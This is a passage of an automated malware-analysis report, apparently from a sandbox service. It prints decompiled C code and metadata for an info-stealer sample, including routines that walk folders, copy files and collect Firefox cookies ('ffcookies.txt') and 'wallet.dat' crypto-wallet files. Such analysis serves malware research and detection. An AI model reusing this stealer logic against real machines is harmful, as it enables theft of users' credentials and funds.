											_t151 = E0040A2AA(_v12 + _t148 * 2,  &_v16,  !=  ? _v32 : 0);
											__eflags = _t151;
											if(_t151 == 0) {
												L51:
												LocalFree(_v32);
												LocalFree(_v16);
												LocalFree(_v20);
												goto L52;
											} else {
												_t218 = _v20;
												_v20 = E0040A503(_v20, _v16);
												__eflags = _t253;
												if(_t253 == 0) {
													_t254 = _v12;
													L41:
													_v24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
													_t158 = E0040A69E(_t218,  &_v24);
													_t265 = _v24;
													__eflags = _t158;
													if(_t158 == 0) {
														L50:
														DeleteFileW(_t265);
														LocalFree(_t265);
														goto L51;
													}
													_t162 =  *((intOrPtr*)( *0x40e184))(_t254, _t265, 0);
													__eflags = _t162;
													if(_t162 == 0) {
														goto L50;
													}
													_t255 =  *((intOrPtr*)( *0x40e03c))(_t265, 0x80000000, 1, 0, 4, 0, 0);
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, 0, 0, 0);
													_v48 = 0;
													_t167 =  *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
													_t245 = _v48;
													_v24 = 0;
													__eflags = _t245;
													if(_t245 == 0) {
														L49:
														LocalFree(_t167);
														CloseHandle(_t255);
														goto L50;
													}
													 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v20, 0xffffffff, 0, _t245, 0, 0);
													__eflags = 0;
													if(0 == 0) {
														L48:
														_t167 = _v24;
														goto L49;
													}
													__eflags = _v28;
													if(_v28 == 0) {
														L47:
														_t223 = _a36;
														_v56 = _v56 & 0x00000000;
														_v68 = _v24;
														_v64 = _t255;
														_v60 = _t265;
														 *_t223 =  *_a36 + 1;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L51;
													}
													_t175 =  *((intOrPtr*)( *0x40e14c))(_t255, 0);
													__eflags = _t175 >> 0xa - _a28;
													if(_t175 >> 0xa >= _a28) {
														goto L48;
													}
													goto L47;
												}
												_t177 = E0040A70E(_t264, _a12);
												__eflags = _t177;
												if(_t177 == 0) {
													L39:
													LocalFree(_v32);
													LocalFree(_v12);
													LocalFree(_v20);
													LocalFree(_v16);
													LocalFree(_t264);
													L53:
													_t107 =  &_a44; // 0x406321
													_t249 =  *_t107;
													L54:
													_t260 = _v36;
													goto L55;
												}
												_t218 = _t264;
												_t182 = E0040A70E(_t264, _a16);
												__eflags = _t182;
												if(_t182 != 0) {
													goto L39;
												}
												_t254 =  *((intOrPtr*)( *0x40e13c))(_v12, _t264);
												_v12 = _t254;
												LocalFree(_t264);
												goto L41;
											}
										}
										_t192 = E0040A70E( &_v620, _a16);
										__eflags = _t192;
										if(_t192 == 0) {
											_t253 = _v28;
											goto L28;
										}
										goto L25;
									}
									__eflags = _t252 - _t135;
									if(_t252 >= _t135) {
										goto L52;
									}
									goto L23;
								}
							}
							__eflags = _v620 - 0x2e;
							if(_v620 == 0x2e) {
								goto L55;
							}
							__eflags = _a20;
							if(_a20 == 0) {
								goto L55;
							}
							_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t262 =  *((intOrPtr*)( *0x40e000))(_t127, _a4,  &_v620);
							_t129 = E0040A70E( &_v620, _a16);
							__eflags = _t129;
							if(_t129 == 0) {
								_t26 = _t249 + 1; // 0x1
								E00405B5B(_v40, _v44, _t262, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t26);
								_t267 = _t267 + 0x2c;
							}
							LocalFree(_t262);
							goto L54;
							L55:
							_t125 =  *((intOrPtr*)( *0x40e148))(_t260,  &_v664);
							__eflags = _t125;
						} while (_t125 != 0);
						_t110 =  &_v52; // 0x406321
						LocalFree( *_t110);
						FindClose(_t260);
						goto L57;
					} else {
						LocalFree(_t195);
						L57:
						__eflags = 0;
						return 0;
					}
				}
				_t194 = 2;
				return _t194;
			}

0x00405b67
0x00405b67
0x00405b6a
0x00405b6d
0x00405b73
0x00405b82
0x00405b8d
0x00405ba1
0x00405ba4
0x00405ba7
0x00405bab
0x00405bb1
0x00405bb6
0x00405bb8
0x00405bc2
0x00405bc8
0x00405bba
0x00405bba
0x00405bba
0x00405bcf
0x00405be1
0x00405be3
0x00405be6
0x00405be9
0x00405bf7
0x00405bfa
0x00405bfd
0x00405bfd
0x00405c04
0x00405c9d
0x00405ca9
0x00405cab
0x00405cad
0x00405caf
0x00405cb7
0x00405cb7
0x00405cbc
0x00405cc4
0x00405cc9
0x00405cd1
0x00405cd7
0x00405cdb
0x00405cde
0x00405cf2
0x00405cf2
0x00405ce0
0x00405ce0
0x00405ceb
0x00405ceb
0x00405cf4
0x00405cf8
0x00405cfb
0x00405fad
0x00405fb0
0x00000000
0x00405d01
0x00405d01
0x00405d04
0x00405d08
0x00405d0c
0x00405d0e
0x00000000
0x00000000
0x00405d14
0x00405d1e
0x00405d27
0x00405d2c
0x00405d2e
0x00405d42
0x00405d42
0x00405d45
0x00405d47
0x00000000
0x00000000
0x00405d52
0x00405d5e
0x00405d74
0x00405d79
0x00405d90
0x00405d93
0x00405d95
0x00405da3
0x00405da3
0x00405d97
0x00405d9f
0x00405d9f
0x00405db1
0x00405db8
0x00405dc4
0x00405dc7
0x00405dc9
0x00405dd2
0x00405dd4
0x00405dd7
0x00405de5
0x00405de5
0x00405dec
0x00405dec
0x00405dd7
0x00405dfa
0x00405e04
0x00405e09
0x00405e0e
0x00405e14
0x00405e16
0x00405f92
0x00405f95
0x00405f9e
0x00405fa7
0x00000000
0x00405e1c
0x00405e1f
0x00405e27
0x00405e2a
0x00405e2c
0x00405e8d
0x00405e90
0x00405ea1
0x00405ea4
0x00405ea9
0x00405eac
0x00405eae
0x00405f84
0x00405f85
0x00405f8c
0x00000000
0x00405f8c
0x00405ebd
0x00405ebf
0x00405ec1
0x00000000
0x00000000
0x00405ee3
0x00405ef6
0x00405f05
0x00405f08
0x00405f0a
0x00405f0d
0x00405f10
0x00405f12
0x00405f76
0x00405f77
0x00405f7e
0x00000000
0x00405f7e
0x00405f2c
0x00405f2e
0x00405f30
0x00405f73
0x00405f73
0x00000000
0x00405f73
0x00405f32
0x00405f36
0x00405f4a
0x00405f4a
0x00405f50
0x00405f54
0x00405f59
0x00405f65
0x00405f6b
0x00405f6d
0x00405f6e
0x00405f6f
0x00405f70
0x00000000
0x00405f70
0x00405f40
0x00405f45
0x00405f48
0x00000000
0x00000000
0x00000000
0x00405f48
0x00405e33
0x00405e38
0x00405e3a
0x00405e63
0x00405e66
0x00405e6f
0x00405e78
0x00405e81
0x00405fb0
0x00405fb0
0x00405fb6
0x00405fb6
0x00405fb9
0x00405fb9
0x00000000
0x00405fb9
0x00405e3f
0x00405e41
0x00405e46
0x00405e48
0x00000000
0x00000000
0x00405e55
0x00405e58
0x00405e5b
0x00000000
0x00405e5b
0x00405e16
0x00405d39
0x00405d3e
0x00405d40
0x00405d4f
0x00000000
0x00405d4f
0x00000000
0x00405d40
0x00405d16
0x00405d18
0x00000000
0x00000000
0x00000000
0x00405d18
0x00405cfb
0x00405c0a
0x00405c12
0x00000000
0x00000000
0x00405c18
0x00405c1c
0x00000000
0x00000000
0x00405c2e
0x00405c4c
0x00405c4e
0x00405c53
0x00405c55
0x00405c57
0x00405c7d
0x00405c82
0x00405c82
0x00405c86
0x00000000
0x00405fbc
0x00405fc9
0x00405fcb
0x00405fcb
0x00405fd3
0x00405fd7
0x00405fde
0x00000000
0x00405beb
0x00405bec
0x00405fe4
0x00405fe4
0x00000000
0x00405fe4
0x00405be9
0x00405b77
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 00405BEC

Strings

., xrefs: 00405C0A
!c@, xrefs: 00405FD3, 00405FD6
xzn, xrefs: 00405CAF
*.lnk, xrefs: 00405CE0
!c@, xrefs: 00405B67, 00405FB6

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: !c@$!c@$*.lnk$.$xzn
API String ID: 2826327444-4107759686
Opcode ID: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
Instruction ID: a0bd4d6dd4f3a97f7616e57fc29639dad099fc1712c2800218aeb084a22374ad
Opcode Fuzzy Hash: b0d5b7ba67e721dc2419ad7a18b72dabb38105fce5c2b9528fe6729ad57d29b4
Instruction Fuzzy Hash: 75D1AC71A00216ABEF04DFA5CD44EAF7775EF48300F104929FA15B72A0DB78A951CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406725 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 321stringCOMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
lstrlenW.KERNEL32 ref: 00406895
lstrlenW.KERNEL32(00000010), ref: 004068A0

Strings

., xrefs: 0040678F
\ffcookies.txt, xrefs: 004068CE

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: lstrlen$CombineFreeGlobalPath
String ID: .$\ffcookies.txt
API String ID: 1001358258-21431651
Opcode ID: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
Opcode Fuzzy Hash: d0294a9fc0581ac0fa3de42f5cfe0cf58799ffb174c14b0ebb38fbd754fd8809
Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B177 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 275
fileCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040B177(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v576;
				char _v584;
				char _v616;
				signed char _v620;
				intOrPtr _v632;
				intOrPtr _v640;
				void* _v648;
				void* _v668;
				void* _v672;
				intOrPtr _v692;
				void* _v696;
				WCHAR* _v704;
				void* _v724;
				void* _v740;
				intOrPtr _v756;
				intOrPtr _v768;
				char _v772;
				intOrPtr _v780;
				intOrPtr _v788;
				intOrPtr _v796;
				signed int _v808;
				void* _v812;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v832;
				void* _v836;
				void* _v844;
				void* __ebx;
				void* __esi;
				void* _t66;
				void* _t70;
				void* _t78;
				void* _t86;
				void* _t89;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t102;
				intOrPtr _t103;
				void* _t116;
				void* _t117;
				void* _t127;
				intOrPtr _t128;
				void* _t130;
				WCHAR* _t132;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t177;
				void* _t182;
				intOrPtr _t183;
				void* _t185;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t194;
				signed int _t196;
				void* _t198;

				_t198 = (_t196 & 0xfffffff8) - 0x28c;
				_t183 = __edx;
				_t190 = __ecx;
				_v640 = __edx;
				_v648 = __ecx;
				_t66 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t182, _t189, _t127);
				_t128 =  *((intOrPtr*)( *0x40e13c))(_t66, _a4);
				_v632 = _t128;
				E0040188C(_t128, _t128, 0x104, __ecx,  *0x40e1d0);
				_t70 =  *((intOrPtr*)( *0x40e018))(_t128,  &_v616);
				_v672 = _t70;
				if(_t70 == 0xffffffff) {
					L21:
					return 0;
				}
				_t130 = _t70;
				do {
					if((_v620 & 0x00000010) == 0) {
						if(E0040A70E( &_v576, _a8) == 0 || E0040A70E( &_v576, _a12) != 0) {
							goto L19;
						} else {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t185 =  *((intOrPtr*)( *0x40e000))(_t86, _a4,  &_v584);
							_v668 = _t185;
							_v704 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t89 = E0040A69E( *0x40e044,  &_v704);
							_t132 = _v704;
							if(_t89 == 0) {
								L17:
								LocalFree(_t132);
								LocalFree(_t185);
								DeleteFileW(_t132);
								L18:
								_t130 = _v696;
								_t183 = _v692;
								goto L19;
							}
							_push(0);
							_push(_t132);
							_push(_t185);
							if( *((intOrPtr*)( *0x40e184))() == 0) {
								goto L17;
							}
							_t96 =  *((intOrPtr*)( *0x40e03c))(_t132, 0x80000000, 1, 0, 4, 0, 0);
							_v724 = _t96;
							GetFileSize(_t96, 0);
							_t98 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_t99 =  *((intOrPtr*)( *0x40e13c))(_t98,  *0x40e1b8);
							_t172 =  *0x40e1b4; // 0x6be360
							_t100 = E0040A503(_t99, _t172);
							_t173 =  *0x40e1b8; // 0x6e7bf8
							_t102 = E0040A503(E0040A503(_t100, _t173), _t190);
							_t103 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v768 = _t103;
							E0040A2AA(_t185 +  *((intOrPtr*)( *0x40e08c))(0) * 2,  &_v772, _v756);
							_t194 = E0040A503(_t102, _v772);
							_v740 = _t194;
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, 0, 0, 0);
							_v780 = 0;
							 *((intOrPtr*)( *0x40e044))(0x40, 0x144);
							_t177 = _v788;
							_v796 = 0;
							if(_t177 == 0) {
								L16:
								LocalFree(_t132);
								LocalFree(_t194);
								LocalFree(_v812);
								LocalFree(_t185);
								L14:
								_t190 = _v808;
								goto L18;
							}
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t194, 0xffffffff, 0, _t177, 0, 0);
							if(0 != 0) {
								_t116 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								_v812 = _v836;
								_v808 = _v832;
								_t117 =  *((intOrPtr*)( *0x40e13c))(_t116, _t132);
								_t160 = _a20;
								_v808 = _v808 & 0x00000000;
								_v812 = _t117;
								 *_t160 =  *_a20 + 1;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t185 = _v832;
								_t194 = _v828;
								goto L16;
							}
							LocalFree(_t194);
							LocalFree(_v828);
							LocalFree(_v844);
							LocalFree(_t132);
							LocalFree(_t185);
							CloseHandle(_v824);
							DeleteFileW(_t132);
							goto L14;
						}
					}
					if(_v576 != 0x2e && E0040A70E( &_v576, _a8) != 0 && E0040A70E( &_v576, _a12) == 0) {
						_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t192 =  *((intOrPtr*)( *0x40e000))(_t78, _a4,  &_v584);
						E0040B177(_v692, _t183, _t192, _a8, _a12, _a16, _a20);
						_t198 = _t198 + 0x14;
						LocalFree(_t192);
						_t190 = _v692;
					}
					L19:
					_push( &_v620);
					_push(_t130);
				} while ( *((intOrPtr*)( *0x40e148))() != 0);
				LocalFree(_v648);
				FindClose(_t130);
				goto L21;
			}

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 0040B30E
LocalFree.KERNEL32(00000000), ref: 0040B3ED
LocalFree.KERNEL32(?), ref: 0040B3F8
LocalFree.KERNEL32(?), ref: 0040B402
LocalFree.KERNEL32(?), ref: 0040B409
LocalFree.KERNEL32(00000000), ref: 0040B410
CloseHandle.KERNEL32(?), ref: 0040B41B
DeleteFileW.KERNEL32(?), ref: 0040B422
LocalFree.KERNEL32(?), ref: 0040B483
LocalFree.KERNEL32(00000000), ref: 0040B48A
LocalFree.KERNEL32(?), ref: 0040B494
LocalFree.KERNEL32(00000000), ref: 0040B49B
LocalFree.KERNEL32(?), ref: 0040B4A4
LocalFree.KERNEL32(00000000), ref: 0040B4AB
DeleteFileW.KERNEL32(?), ref: 0040B4B2
LocalFree.KERNEL32(?), ref: 0040B4D9
FindClose.KERNEL32(00000000), ref: 0040B4E0

Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D

Strings

., xrefs: 0040B1EC
`k, xrefs: 0040B332

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$File$CloseDelete$AllocFindHandleSize
String ID: .$`k
API String ID: 3415656112-3438554548
Opcode ID: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
Opcode Fuzzy Hash: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE06 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
LocalFree.KERNEL32(00000000), ref: 0040AEA9
LocalFree.KERNEL32(00000000), ref: 0040AEB0

Strings

`k, xrefs: 0040AFF0
wallet.dat, xrefs: 0040AF43

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID: `k$wallet.dat
API String ID: 1941890384-2554930965
Opcode ID: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
Opcode Fuzzy Hash: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004039D7 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 223
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* _v56;
				char _v608;
				signed char _v652;
				void* _t47;
				void* _t50;
				void* _t57;
				void* _t60;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				void* _t143;
				DWORD* _t144;
				void* _t145;
				void* _t149;

				_t101 = __ecx;
				_v24 = __edx;
				_v40 = __ecx;
				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
				_t129 =  *0x40e1d0; // 0x6e7918
				_t143 = E0040A503(_t47, _t129);
				_v20 = _t143;
				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
				_v16 = _t50;
				if(_t50 != 0xffffffff) {
					_t144 = 0;
					do {
						if((_v652 & 0x00000010) != 0) {
							goto L11;
						} else {
							_push(L"..");
							_push( &_v608);
							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
								goto L11;
							} else {
								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
								_v36 = _t149;
								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t60 = E0040A69E( *0x40e044,  &_v8);
								_t102 = _v8;
								if(_t60 == 0) {
									L16:
									LocalFree(_t102);
									LocalFree(_t149);
									DeleteFileW(_t102);
								} else {
									_push(_t144);
									_push(_t102);
									_push(_t149);
									if( *((intOrPtr*)( *0x40e184))() == 0) {
										goto L16;
									} else {
										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
										_v32 = _t68;
										GetFileSize(_t68, _t144);
										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
										_t132 =  *0x40e1b4; // 0x6be360
										_t72 = E0040A503(_t71, _t132);
										_t133 =  *0x40e1b8; // 0x6e7bf8
										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
										_t135 =  *0x40e1ec; // 0x6e78b8
										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
										_t137 =  *0x40e1ec; // 0x6e78b8
										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
										_t139 =  *0x40e1b8; // 0x6e7bf8
										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
										_v12 = _t80;
										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
										_v28 = _t81;
										_t22 = _t81 + 0x40; // 0x40
										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
										_t84 = _v28;
										if(_t84 == 0) {
											LocalFree(_t145);
											LocalFree(_v8);
											goto L10;
										} else {
											_push(0);
											_push(0);
											_push(_t84);
											_push(_t145);
											_push(0xffffffff);
											_push(_v12);
											_push(0);
											_push(0xfde9);
											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
												LocalFree(_v12);
												LocalFree(_t145);
												LocalFree(_t102);
												LocalFree(_t149);
												LocalFree(_v8);
												break;
											} else {
												_v52 = _v32;
												_v56 = _t145;
												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
												_t126 = _a16;
												_v44 = _v44 & 0x00000000;
												_v48 = _t98;
												 *_t126 =  *_a16 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t149 = _v36;
												L10:
												LocalFree(_t102);
												LocalFree(_t149);
												_t101 = _v40;
												_t144 = 0;
												goto L11;
											}
										}
									}
								}
							}
						}
						L13:
						LocalFree(_v20);
						goto L14;
						L11:
						_push( &_v652);
						_push(_v16);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					FindClose(_v16);
					goto L13;
				}
				L14:
				return 0;
			}

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
LocalFree.KERNEL32(00000000), ref: 00403BFB
LocalFree.KERNEL32(?), ref: 00403C04
LocalFree.KERNEL32(?), ref: 00403C0B
LocalFree.KERNEL32(00000000), ref: 00403C12
FindClose.KERNEL32(00000002), ref: 00403C39
LocalFree.KERNEL32(00000002), ref: 00403C42
LocalFree.KERNEL32(?), ref: 00403C52
LocalFree.KERNEL32(00000000), ref: 00403C59
LocalFree.KERNEL32(?), ref: 00403C60
LocalFree.KERNEL32(00000000), ref: 00403C67
LocalFree.KERNEL32(?), ref: 00403C70
LocalFree.KERNEL32(?), ref: 00403C79
LocalFree.KERNEL32(00000000), ref: 00403C80
DeleteFileW.KERNEL32(?), ref: 00403C87

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Strings

`k, xrefs: 00403AF2

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Filelstrlen$CloseDeleteFindGlobalSize
String ID: `k
API String ID: 1958670688-2483355702
Opcode ID: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
Opcode Fuzzy Hash: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8F Relevance: 24.3, APIs: 16, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				char _v596;
				signed int _v640;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t77;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				void* _t97;
				signed int _t101;
				signed int _t103;
				void* _t105;
				void* _t107;
				void* _t109;
				void* _t111;
				signed int _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				signed int _t160;
				intOrPtr _t173;
				void* _t181;
				void* _t186;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v36 = __edx;
				_v28 = __ecx;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
				while(1) {
					_t124 = _t60;
					if(_t124 == 0) {
						break;
					}
					_t125 = _t124 + 8;
					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
					_t3 = _t62 + 2; // 0x2
					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v24 = _t63;
					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64);
					_v12 = _t66;
					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68);
					_v16 = _t70;
					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
					_v20 = _t186;
					_v32 = _v24 - _t125 >> 1;
					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
					__eflags = _t77;
					if(_t77 == 0) {
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_t186);
						L16:
						L17:
						return 1;
					}
					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
					_t189 = _t181 - _t125 >> 1;
					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
					__eflags = _t86;
					if(_t86 == 0) {
						L14:
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L16;
					}
					_t17 = _t181 + 2; // 0x2
					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
					_t20 = _t189 + 1; // 0x1
					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
					__eflags = _t91;
					if(_t91 == 0) {
						goto L14;
					}
					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
					_v24 = _t94;
					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
					_t173 =  *0x40e1d0; // 0x6e7918
					_t97 = E0040A503(_t96, _t173);
					_v44 = _t97;
					_t127 =  *((intOrPtr*)( *0x40e018))(_t97,  &_v640);
					_v40 = _t127;
					__eflags = _t127 - 0xffffffff;
					if(_t127 == 0xffffffff) {
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						__eflags = _v640 & 0x00000010;
						if((_v640 & 0x00000010) != 0) {
							__eflags = _v596 - 0x2e;
							if(_v596 != 0x2e) {
								_t103 =  *((intOrPtr*)( *0x40e18c))( &_v596, _v12);
								__eflags = _t103;
